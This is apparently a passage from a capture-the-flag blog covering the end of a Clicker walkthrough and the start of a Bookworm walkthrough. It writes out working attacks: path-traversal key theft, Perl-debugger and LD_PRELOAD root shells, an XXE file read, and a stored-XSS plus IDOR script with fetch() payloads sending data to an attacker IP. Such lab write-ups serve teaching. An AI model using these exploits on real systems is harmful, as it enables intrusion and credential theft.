ERROR 1064 (42000) at line 1: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
' at line 1
I can also get jack’s SSH private key:
www-data@clicker:/opt/manage$ ./execute_query 223 ../.ssh/id_rsa
mysql: [Warning] Using a password on the command line interface can be insecure.
--------------
-----BEGIN OPENSSH PRIVATE KEY---
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAs4eQaWHe45iGSieDHbraAYgQdMwlMGPt50KmMUAvWgAV2zlP8/1Y
...[snip]...
LsOxRu230Ti7tRBOtV153KHlE4Bu7G/d028dbQhtfMXJLu96W1l3Fr98pDxDSFnig2HMIi
lL4gSjpD/FjWk9AAAADGphY2tAY2xpY2tlcgECAwQFBg==
-----END OPENSSH PRIVATE KEY---
--------------
ERROR 1064 (42000) at line 1: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-----BEGIN OPENSSH PRIVATE KEY---
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAA' at line 1
Interestingly, if I try to use this key just as is, I get:
oxdf@hacky$ ssh -i ~/keys/clicker-jack jack@clicker.htb
Load key "/home/oxdf/keys/clicker-jack": error in libcrypto
jack@clicker.htb's password:
I’ll have to add two “-“ to the first and last line from the key (no idea why those got truncated), and then it works:
oxdf@hacky$ ssh -i ~/keys/clicker-jack jack@clicker.htb
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-84-generic x86_64)
...[snip]...
jack@clicker:~$
And I can get user.txt
:
jack@clicker:~$ cat user.txt
fa528539************************
jack has two sudo
entries configured:
jack@clicker:~$ sudo -l
Matching Defaults entries for jack on clicker:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User jack may run the following commands on clicker:
(ALL : ALL) ALL
(root) SETENV: NOPASSWD: /opt/monitor.sh
With a password, jack can run any command as any user. Without a password, jack can run monitor.sh
(with SETENV
set). SETENV
preserves the environment when calling the script.
The monitor.sh
script is relatively simple:
#!/bin/bash
if [ "$EUID" -ne 0 ]
then echo "Error, please run as root"
exit
fi
set PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
unset PERL5LIB;
unset PERLLIB;
data=$(/usr/bin/curl -s http://clicker.htb/diagnostic.php?token=secret_diagnostic_token);
/usr/bin/xml_pp <<< $data;
if [[ $NOSAVE == "true" ]]; then
exit;
else
timestamp=$(/usr/bin/date +%s)
/usr/bin/echo $data > /root/diagnostic_files/diagnostic_${timestamp}.xml
fi
It starts by making sure it’s running as root. Then it sets the PATH and unset
some Perl-related env variables. These are presumably for security issues, preventing a hijack of xml_pp
which is Perl-based.
jack@clicker:/opt$ file /usr/bin/xml_pp
/usr/bin/xml_pp: Perl script text executable
Then it uses curl
to request the diagnostic.php
page from the site, passing the token “secret_diagnostic_token”, and sends the result into xml_pp
, and saves the result to a file in /root
.
xml_pp
(short for XML pretty printer) will print XML data in a nicer way.
diagnostic.php
starts by checking the the correct token is passed as a GET parameter:
<?php
if (isset($_GET["token"])) {
if (strcmp(md5($_GET["token"]), "ac0e5a6a3a50b5639e69ae6d8cd49f40") != 0) {
header("HTTP/1.1 401 Unauthorized");
exit;
}
}
else {
header("HTTP/1.1 401 Unauthorized");
die;
}
“secret_diagnostic_token” is the right password here:
jack@clicker:/opt$ echo -n 'secret_diagnostic_token' | md5sum
ac0e5a6a3a50b5639e69ae6d8cd49f40 -
Then it defines a function that converts an array to XML. Then it gets a bunch of stats about the server and returns it as XML:
$db_server="localhost";
$db_username="clicker_db_user";
$db_password="clicker_db_password";
$db_name="clicker";
$connection_test = "OK";
try {
$pdo = new PDO("mysql:dbname=$db_name;host=$db_server", $db_username, $db_password, array(PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION));
} catch(PDOException $ex){
$connection_test = "KO";
}
$data=[];
$data["timestamp"] = time();
$data["date"] = date("Y/m/d h:i:sa");
$data["php-version"] = phpversion();
$data["test-connection-db"] = $connection_test;
$data["memory-usage"] = memory_get_usage();
$env = getenv();
$data["environment"] = $env;
$xml_data = new SimpleXMLElement('<?xml version="1.0"?><data></data>');
array_to_xml($data,$xml_data);
$result = $xml_data->asXML();
print $result;
?>
Running the script without root fails as expected, and as root returns the XML as expected:
jack@clicker:/opt$ /opt/monitor.sh
Error, please run as root
jack@clicker:/opt$ sudo /opt/monitor.sh
<?xml version="1.0"?>
<data>
<timestamp>1706213156</timestamp>
<date>2024/01/25 08:05:56pm</date>
<php-version>8.1.2-1ubuntu2.14</php-version>
<test-connection-db>OK</test-connection-db>
<memory-usage>392704</memory-usage>
<environment>
<APACHE_RUN_DIR>/var/run/apache2</APACHE_RUN_DIR>
<SYSTEMD_EXEC_PID>1173</SYSTEMD_EXEC_PID>
<APACHE_PID_FILE>/var/run/apache2/apache2.pid</APACHE_PID_FILE>
<JOURNAL_STREAM>8:26785</JOURNAL_STREAM>
<PATH>/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin</PATH>
<INVOCATION_ID>fa242859cf764eb9975e7efc5d6d3c37</INVOCATION_ID>
<APACHE_LOCK_DIR>/var/lock/apache2</APACHE_LOCK_DIR>
<LANG>C</LANG>
<APACHE_RUN_USER>www-data</APACHE_RUN_USER>
<APACHE_RUN_GROUP>www-data</APACHE_RUN_GROUP>
<APACHE_LOG_DIR>/var/log/apache2</APACHE_LOG_DIR>
<PWD>/</PWD>
</environment>
</data>
Giving a user access to environment variables is dangerous, and while the author tires to prevent some attacks by setting the PATH
and unsetting two Perl-related variables, there are still multiple ways to get root on this box. I’ll show three (with the intended path in yellow):
flowchart TD;
I[Shell as jack]-->A(sudo monitor.sh)
A-->B(Perl Debug);
B-->C(Code Execution);
C-->D[root Shell];
A-->E(http_proxy);
E-->F(XXE File Read);
F-->G(root SSH Key);
G-->D;
A-->H(LD_PRELOAD);
H-->C;
linkStyle default stroke-width:2px,stroke:#FFFF99,fill:none;
linkStyle 1,2,3,8,9 stroke-width:2px,stroke:#4B9CD3,fill:none;
There’s a flag in Perl, -d
, that sets the debugger:
-d[:debugger] run program under debugger
In this script, I can’t set flags in the command line, but I can set the PERL5OPT
environment variable, which will also set options. So if I set PERL5OPT=-d
, then the debugger will be invoked.
There’s another variable, PERL5DB
that sets a BEGIN block for the code to run when the debugger starts.
There is a somewhat famous example of a bug in the Exim mail server from 2016 where it allowed the user to set environment variables in this way, CVE-2016-1531:
Exim before 4.86.2, when installed setuid root, allows local users to gain privileges via the perl_startup argument.
POCs for this vulnerability show these variables used in exploitation:
To run this, I’ll just set these environment variables to touch a file:
jack@clicker:~$ sudo PERL5OPT=-d PERL5DB='system("touch /0xdf")' /opt/monitor.sh
No DB::DB routine defined at /usr/bin/xml_pp line 9.
No DB::DB routine defined at /usr/lib/x86_64-linux-gnu/perl-base/File/Temp.pm line 870.
END failed--call queue aborted.
The 0xdf
file now exists owned by root in the system root:
jack@clicker:~$ ls -l /0xdf
-rw-r--r-- 1 root root 0 Jan 25 20:32 /0xdf
To get a shell, I’ll create a copy of bash
and make it SetUID and SetGID:
jack@clicker:~$ sudo PERL5OPT=-d PERL5DB='system("cp /bin/bash /tmp/0xdf; chown root:root /tmp/0xdf; chmod 6777 /tmp/0xdf")' /opt/monitor.sh
No DB::DB routine defined at /usr/bin/xml_pp line 9.
No DB::DB routine defined at /usr/lib/x86_64-linux-gnu/perl-base/File/Temp.pm line 870.
END failed--call queue aborted.
The file now exists, is owned by root, and is SetUID and SetGID:
jack@clicker:~$ ls -l /tmp/0xdf
-rwsrwsrwx 1 root root 1396520 Jan 25 20:36 /tmp/0xdf
I’ll run it (not forgetting -p
to not drop privs) and get an effective root shell:
jack@clicker:~$ /tmp/0xdf -p
0xdf-5.1# id
uid=1000(jack) gid=1000(jack) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),1000(jack)
And the flag:
0xdf-5.1# cat /root/root.txt
c9b19375************************
The intended path for this box is to use the http_proxy
variable. This is an option for curl
that is detailed on the curl
man` page:
I’ll modify my Burp Proxy options to listen on all interfaces, rather than just localhost:
Now on running sudo http_proxy=http://10.10.14.6:8080 /opt/monitor.sh
, the request and response show up in my Burp Proxy history:
This allows me to modify the request and the response.
I’ll enabling response interception in Burp, and when I run the command with http_proxy
set to my Burp instance, it’ll hang on that intercepted request, which I’ll let go through. Then it hangs on the response:
I’ll grab a basic XXE payload (for example from here) and update the response:
On clicking “Forward”, the file shows up in the terminal:
jack@clicker:~$ sudo http_proxy=http://10.10.14.6:8080 /opt/monitor.sh
<?xml version="1.0"?>
<!DOCTYPE replace [
<!ENTITY ent SYSTEM "/etc/passwd">
]>
<file>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
jack:x:1000:1000:jack:/home/jack:/bin/bash
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:114:120:MySQL Server,,,:/nonexistent:/bin/false
_rpc:x:115:65534::/run/rpcbind:/usr/sbin/nologin
statd:x:116:65534::/var/lib/nfs:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false
</file>
There are a handful of files I could try to read. root.txt
would be a start, but I’d rather go for a shell. There happens to be a root SSH key when I set the XML to:
<?xml version="1.0"?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "/root/.ssh/id_rsa">]>
<file>&ent;</file>
The result is:
jack@clicker:~$ sudo http_proxy=http://10.10.14.6:8080 /opt/monitor.sh
<?xml version="1.0"?>
<!DOCTYPE replace [
<!ENTITY ent SYSTEM "/root/.ssh/id_rsa">
]>
<file>-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAmQBWGDv1n5tAPBu2Q/DsRCIZoPhthS8T+uoYa6CL+gKtJJGok8xC
...[snip]...
UyOYOJc1Mv8zkAAAAMcm9vdEBjbGlja2VyAQIDBAUGBw==
-----END OPENSSH PRIVATE KEY-----
</file>
With that, I’m able to save it to a file on my host, and SSH in:
oxdf@hacky$ vim ~/keys/clicker-root
oxdf@hacky$ chmod 600 ~/keys/clicker-root
oxdf@hacky$ ssh -i ~/keys/clicker-root root@clicker.htb
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-84-generic x86_64)
...[snip]...
root@clicker:~#
Ippsec actually pointed this one out to me (though I’m embarrassed I missed it in hindsight). If I can set almost any environment variable, why not LD_PRELOAD
? LD_PRELOAD
is an environment variable that tells all running programs of a library to load on executing. This HackTricks page has exploit code.
I’ll create a simple C program that unsets the LD_PRELOAD
variable (to prevent loops), sets the privileges to root user and group, and runs bash
:
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
There’s no compilation tools on the host, but since both it and my VM are Ubuntu-based, compiling locally shouldn’t cause issues. I’ll generate a .so
file:
oxdf@hacky$ gcc -fPIC -shared -o shell.so shell.c -nostartfiles
I’ll copy this file up to Clicker into /tmp
. Now I can run with LD_PRELOAD
pointing at this shared object and it will run bash
:
jack@clicker:~$ sudo LD_PRELOAD=/tmp/shell.so /opt/monitor.sh
root@clicker:/home/jack#
Bookworm starts with a gnarly exploit chain combining cross-site scripting, insecure upload, and insecure direct object reference vulnerabilities to identify an HTTP endpoint that allows for file download. In this endpoint, I’ll find that if multiple files are requested, one can attack a directory traversal to return arbitrary files in the returned Zip archive. I’ll use that to leak database creds that also work for SSH on the box. The next user is running a dev webserver that manages ebook format conversion. I’ll abuse this with symlinks to get arbitrary write, and write an SSH public key and get access. For root, I’ll abuse a SQL injection in a label creating script to do PostScript injectin to read and write files as root. In Beyond Root, I’ll look at the Express webserver from the foothold and how it was vulnerable and where it wasn’t.
Name | Bookworm Play on HackTheBox |
---|---|
Release Date | 27 May 2023 |
Retire Date | 20 Jan 2024 |
OS | Linux |
Base Points | Insane [50] |
Rated Difficulty | |
Radar Graph | |
01:31:16 | |
02:12:34 | |
Creator |
nmap
finds two open TCP ports, SSH (22) and HTTP (80):
oxdf@hacky$ nmap -p- --min-rate 10000 10.10.11.215
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-13 15:21 EST
Nmap scan report for 10.10.11.215
Host is up (0.11s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 8.07 seconds
oxdf@hacky$ nmap -p 22,80 -sCV 10.10.11.215
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-13 15:23 EST
Nmap scan report for 10.10.11.215
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://bookworm.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.09 seconds
Based on the OpenSSH version, the host is likely running Ubuntu 20.04 focal. On 80, it’s redirecting to bookworm.htb
. I’ll fuzz for subdomains with ffuf
, but it doesn’t find anything. I’ll add bookworm.htb
to my /etc/hosts
file, and re-run nmap
to check for anything new, but there’s nothing interesting.
The site is a book store:
/shop
offers books and prices:
Clicking on a book gives a page with details at /shop/[id]
:
Trying to add a book to my “basket” (or cart) redirects to /login
with a message saying I must be logged in:
I’m able to register and create an account. Then I can add to my basket, and go to checkout:
There’s an important note here. They are no longer offering free e-book downloads, but users who purchased when they were can download them still.
I’ll complete the order:
The profile page has the ability to upload my information, upload an avatar, and see my order history:
The HTTP headers show that this is a JavaScript Express web server:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 13 Jan 2024 20:31:31 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: Express
Content-Security-Policy: script-src 'self'
ETag: W/"cdd-GfQn3pwdx5hNePMjMr3ZkL72DBY"
Content-Length: 3293
The 404 page is the default Express 404 page as well:
There is a cookie and a cookie signature:
The cookie is just base64, which decodes to:
{
"flashMessage":{},
"user":{
"id":14,
"name":"0xdf",
"avatar":"/static/img/uploads/14"
}
}
If I could compromise the secret that’s used with the signature, I could potentially forge cookies, but that won’t come into play here.
I’ll also note that the Cookies are marked when set as HttpOnly
, which means I won’t be able to exfil them via XSS:
I’ll run feroxbuster
against the site:
oxdf@hacky$ feroxbuster -u http://bookworm.htb
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.9.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://bookworm.htb
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.9.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 10l 15w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 90l 292w 3293c http://bookworm.htb/
302 GET 1l 4w 23c http://bookworm.htb/logout => http://bookworm.htb/
200 GET 62l 140w 2040c http://bookworm.htb/login
200 GET 82l 197w 3093c http://bookworm.htb/register
200 GET 239l 675w 10778c http://bookworm.htb/shop
301 GET 10l 16w 179c http://bookworm.htb/static => http://bookworm.htb/static/
200 GET 62l 140w 2034c http://bookworm.htb/Login
302 GET 1l 4w 28c http://bookworm.htb/profile => http://bookworm.htb/login
302 GET 1l 4w 28c http://bookworm.htb/basket => http://bookworm.htb/login
301 GET 10l 16w 185c http://bookworm.htb/static/js => http://bookworm.htb/static/js/
301 GET 10l 16w 187c http://bookworm.htb/static/css => http://bookworm.htb/static/css/
301 GET 10l 16w 187c http://bookworm.htb/static/img => http://bookworm.htb/static/img/
301 GET 10l 16w 203c http://bookworm.htb/static/img/uploads => http://bookworm.htb/static/img/uploads/
200 GET 239l 675w 10772c http://bookworm.htb/Shop
302 GET 1l 4w 28c http://bookworm.htb/Profile => http://bookworm.htb/login
301 GET 10l 16w 199c http://bookworm.htb/static/img/books => http://bookworm.htb/static/img/books/
200 GET 1979l 12005w 876363c http://bookworm.htb/static/img/uploads/1
200 GET 2070l 11925w 839521c http://bookworm.htb/static/img/uploads/5
200 GET 2035l 11769w 850715c http://bookworm.htb/static/img/uploads/3
200 GET 82l 197w 3093c http://bookworm.htb/Register
200 GET 2352l 13106w 923635c http://bookworm.htb/static/img/uploads/2
302 GET 1l 4w 28c http://bookworm.htb/Basket => http://bookworm.htb/login
200 GET 2216l 12734w 886261c http://bookworm.htb/static/img/uploads/4
200 GET 2000l 12205w 882180c http://bookworm.htb/static/img/uploads/6
301 GET 10l 16w 179c http://bookworm.htb/Static => http://bookworm.htb/Static/
302 GET 1l 4w 23c http://bookworm.htb/Logout => http://bookworm.htb/
301 GET 10l 16w 185c http://bookworm.htb/Static/js => http://bookworm.htb/Static/js/
301 GET 10l 16w 187c http://bookworm.htb/Static/img => http://bookworm.htb/Static/img/
301 GET 10l 16w 187c http://bookworm.htb/Static/css => http://bookworm.htb/Static/css/
301 GET 10l 16w 203c http://bookworm.htb/Static/img/uploads => http://bookworm.htb/Static/img/uploads/
301 GET 10l 16w 199c http://bookworm.htb/Static/img/books => http://bookworm.htb/Static/img/books/
200 GET 1979l 12005w 876363c http://bookworm.htb/Static/img/uploads/1
200 GET 2035l 11769w 850715c http://bookworm.htb/Static/img/uploads/3
200 GET 2070l 11925w 839521c http://bookworm.htb/Static/img/uploads/5
200 GET 2352l 13106w 923635c http://bookworm.htb/Static/img/uploads/2
200 GET 0l 0w 496122c http://bookworm.htb/Static/img/uploads/4
200 GET 2000l 12205w 882180c http://bookworm.htb/Static/img/uploads/6
200 GET 62l 140w 2034c http://bookworm.htb/LOGIN
301 GET 10l 16w 179c http://bookworm.htb/STATIC => http://bookworm.htb/STATIC/
301 GET 10l 16w 185c http://bookworm.htb/STATIC/js => http://bookworm.htb/STATIC/js/
301 GET 10l 16w 187c http://bookworm.htb/STATIC/img => http://bookworm.htb/STATIC/img/
301 GET 10l 16w 187c http://bookworm.htb/STATIC/css => http://bookworm.htb/STATIC/css/
301 GET 10l 16w 203c http://bookworm.htb/STATIC/img/uploads => http://bookworm.htb/STATIC/img/uploads/
500 GET 7l 14w 186c http://bookworm.htb/ecology
500 GET 7l 14w 186c http://bookworm.htb/STATIC/img/werbung
500 GET 7l 14w 186c http://bookworm.htb/STATIC/js/exports
500 GET 7l 14w 186c http://bookworm.htb/Static/css/530
500 GET 7l 14w 186c http://bookworm.htb/static/img/uploads/lettings
200 GET 1979l 12005w 876363c http://bookworm.htb/STATIC/img/uploads/1
200 GET 2070l 11925w 839521c http://bookworm.htb/STATIC/img/uploads/5
200 GET 2035l 11769w 850715c http://bookworm.htb/STATIC/img/uploads/3
200 GET 2352l 13106w 923635c http://bookworm.htb/STATIC/img/uploads/2
500 GET 7l 14w 186c http://bookworm.htb/kmail
500 GET 7l 14w 186c http://bookworm.htb/static/js/zWorkingFiles
500 GET 7l 14w 186c http://bookworm.htb/Static/js/bluechat
500 GET 7l 14w 186c http://bookworm.htb/Static/js/board_old
500 GET 7l 14w 186c http://bookworm.htb/static/img/books/purpose
500 GET 7l 14w 186c http://bookworm.htb/landing-page-4
500 GET 7l 14w 186c http://bookworm.htb/static/css/yell
500 GET 7l 14w 186c http://bookworm.htb/static/img/search-form-js
500 GET 7l 14w 186c http://bookworm.htb/static/css/zapchasti
200 GET 2000l 12205w 882180c http://bookworm.htb/STATIC/img/uploads/6
[####################] - 8m 540000/540000 0s found:62 errors:76839
[####################] - 5m 30000/30000 96/s http://bookworm.htb/
[####################] - 6m 30000/30000 76/s http://bookworm.htb/static/
[####################] - 6m 30000/30000 75/s http://bookworm.htb/static/js/
[####################] - 6m 30000/30000 75/s http://bookworm.htb/static/css/
[####################] - 6m 30000/30000 76/s http://bookworm.htb/static/img/
[####################] - 6m 30000/30000 74/s http://bookworm.htb/static/img/uploads/
[####################] - 6m 30000/30000 73/s http://bookworm.htb/static/img/books/
[####################] - 6m 30000/30000 73/s http://bookworm.htb/Static/
[####################] - 6m 30000/30000 72/s http://bookworm.htb/Static/js/
[####################] - 6m 30000/30000 72/s http://bookworm.htb/Static/img/
[####################] - 6m 30000/30000 73/s http://bookworm.htb/Static/css/
[####################] - 6m 30000/30000 72/s http://bookworm.htb/Static/img/uploads/
[####################] - 6m 30000/30000 73/s http://bookworm.htb/Static/img/books/
[####################] - 4m 30000/30000 106/s http://bookworm.htb/STATIC/
[####################] - 4m 30000/30000 107/s http://bookworm.htb/STATIC/js/
[####################] - 4m 30000/30000 107/s http://bookworm.htb/STATIC/img/
[####################] - 4m 30000/30000 107/s http://bookworm.htb/STATIC/css/
[####################] - 4m 30000/30000 108/s http://bookworm.htb/STATIC/img/uploads/
One take-away is that the server doesn’t seem to be case-sensitive, which is not common on Linux webservers. The /static/img/uploads
directory seems interesting. It seems to be where profile pictures are stored, like these:
When I change my avatar, it is stored at /static/img/uploads/14
. Nothing else too interesting.
The note that comes with my order is the one place on the website where I can put in text and it is displayed back, so I’ll want to check that for cross-site scripting (XSS). I’ll try a simple <script>alert(1)</script>
payload. When I view the order, the note looks empty:
Interestingly, in the page source, the full tag is there:
So why was there no pop up? The console shows the answer:
There is a content security policy (CSP) specified in the response headers for the page:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 14 Jan 2024 19:19:23 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: Express
Content-Security-Policy: script-src 'self'
ETag: W/"889-a2rRyHrrtWJh7mMEDW/b7erywnQ"
Set-Cookie: session=eyJmbGFzaE1lc3NhZ2UiOnt9LCJ1c2VyIjp7ImlkIjoxNCwibmFtZSI6IjB4ZGYiLCJhdmF0YXIiOiIvc3RhdGljL2ltZy91cGxvYWRzLzE0In19; path=/; httponly
Set-Cookie: session.sig=-Bo5hHK-aeYn-cDoCzzTzICGdrg; path=/; httponly
Content-Length: 2185
The self
directive specifies that the same origin is a valid source for scripts, and since there’s nothing else listed, nothing else will run. If I want to run a script, I need it to come from Bookworm.
The one place I found that I can upload files is the avatar. I’ll see what happens when I try to upload a JavaScript file. I’ll upload an image and get the request in Burp, sending it to Repeater. It’s a POST request to /profile/avatar
.
If I change the Content-Type
to anything that’s not image/png
or image/jpeg
, the response has the same redirect, but the cookie is set:
That cookie has a “flash message”:
However, if I don’t change the Content-Type
, I can put whatever I want in the payload:
No cookie update means success. On my profile there’s a broken image:
If I create a message on an order to include the path to that image as the script source, like <script src="/static/img/uploads/14"></script>
, then when I view that order:
At this point, I have XSS in my orders page, but doesn’t seem like anyone is checking it. I’ll include some JavaScript that will connect back to my host, using a simple fetch
payload:
I’m showing the JavaScript Fetch API here where in the past I’ve often shown XMLHttpRequest
. Either could work, but fetch
is pretty clean.
When I refresh the same order, it loads the new JavaScript and makes an attempt at my server:
10.10.14.6 - - [15/Jan/2024 11:30:55] code 404, message File not found
10.10.14.6 - - [15/Jan/2024 11:30:55] "GET /xss HTTP/1.1" 404 -
Unfortunately, there are no connections back to me from any other users. It makes sense that no one else is looking at my orders. I’ll need to find a way to get XSS in front of another user.
I’ll need to find a page that other users are checking if XSS is going to get anywhere. I’ll notice when I update my basket note that the POST looks like:
POST /basket/386/edit HTTP/1.1
Host: bookworm.htb
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Origin: http://bookworm.htb
Connection: close
Referer: http://bookworm.htb/basket
Cookie: session=eyJmbGFzaE1lc3NhZ2UiOnt9LCJ1c2VyIjp7ImlkIjoxNCwibmFtZSI6IjB4ZGYiLCJhdmF0YXIiOiIvc3RhdGljL2ltZy91c2VyLnBuZyJ9fQ==; session.sig=oXoXrRyKLk0xwu6KhLkPo6XC6hw
Upgrade-Insecure-Requests: 1
quantity=1¬e=This+is+a+new+note
The 386 in the url must be the ID of the basket being updated. When I visit the /shop
page, I’ll notice that my activity is displayed:
Interestingly, that block of HTML has a comment above it:
If I visit when there’s another user there, their basket ID is in a comment as well:
Given that the basket ID is specified in the POST request to edit the comment, I’ll try writing to the basket of another user and see if I can edit it. I’ll choose a user who just added something to their cart, as they are most likely to be checking it.
I’ll grab an ID from the HTML in recent activity, and add that to a POST request in Repeater:
On sending, it returns a redirect to /basket
(just like when I do it legitimately), and the Cookie has a flash message showing success:
A few minutes later, there’s a request at my Python webserver:
10.10.11.215 - - [15/Jan/2024 14:23:40] code 404, message File not found
10.10.11.215 - - [15/Jan/2024 14:23:40] "GET /xss HTTP/1.1" 404 -
This is a classic insecure direct object reference (IDOR) vulnerability, as I’m able to access something I shouldn’t be able to just be changing the ID.
I’m going to need to update my XSS payload and then poison baskets again to figure out where to go next. I’ll write a quick Python script to make the necessary requests:
#!/usr/bin/env python3
import re
import requests
username = "0xdf"
password = "0xdf0xdf"
my_avatar_id = 14
base_url = "http://bookworm.htb"
xss = """fetch('http://10.10.14.6/python');"""
sess = requests.session()
# login
sess.post(f'{base_url}/login', data={"username": username, "password": password})
# set XSS in avatar
sess.post(f'{base_url}/profile/avatar', files={'avatar': ('htb.js', xss, 'image/png')})
# get basket id and IDOR
resp = sess.get(f'{base_url}/shop')
ids = re.findall('<!-- (\d+) -->', resp.text)
for bid in ids:
resp = sess.post(f'{base_url}/basket/{bid}/edit', data={"quantity": "1", "note": f'<script src="/static/img/uploads/{my_avatar_id}"></script>'}, allow_redirects=False)
if resp.status_code == 302:
print(f"Poisoned basket {bid}")
This assumes that the user 0xdf already exists with the password 0xdf0xdf, with an avatar ID of 14 (all configured at the top). It updates the avatar with the JavaScript defined towards the top, and then gets all the basket ids from /shop
and poisons them.
I’m going to have to build a bunch of XSS payloads to get through the next step. To test, there’s a few techniques I found very helpful.
First, I’ll have an order on my profile page poisoned to load JavaScript from my avatar. This allows me to upload new JS, and then refresh my profile and look for errors in the developer tools console.
It’s also very useful to test JavaScript directly in the dev console before trying to put it into XSS payloads. It shows errors and line numbers, catching simple syntax errors.
I noted above that the cookies on the site are marked HttpOnly, so exfiling those won’t work. I don’t know of any other sites that might exist, but I could try to enumerate other ports on localhost. Before doing that, I’ll take a look at what these users can see on bookworm.htb
. I’ll set the xss
variable in my script to the following to take a look at the user’s profile:
fetch('/profile', {credentials: "include"})
.then((resp) => resp.text())
.then((resptext) => {
fetch("http://10.10.14.6/exfil", {
method: "POST",
mode: "no-cors",
body: resptext
});
});
I’ll listen with nc
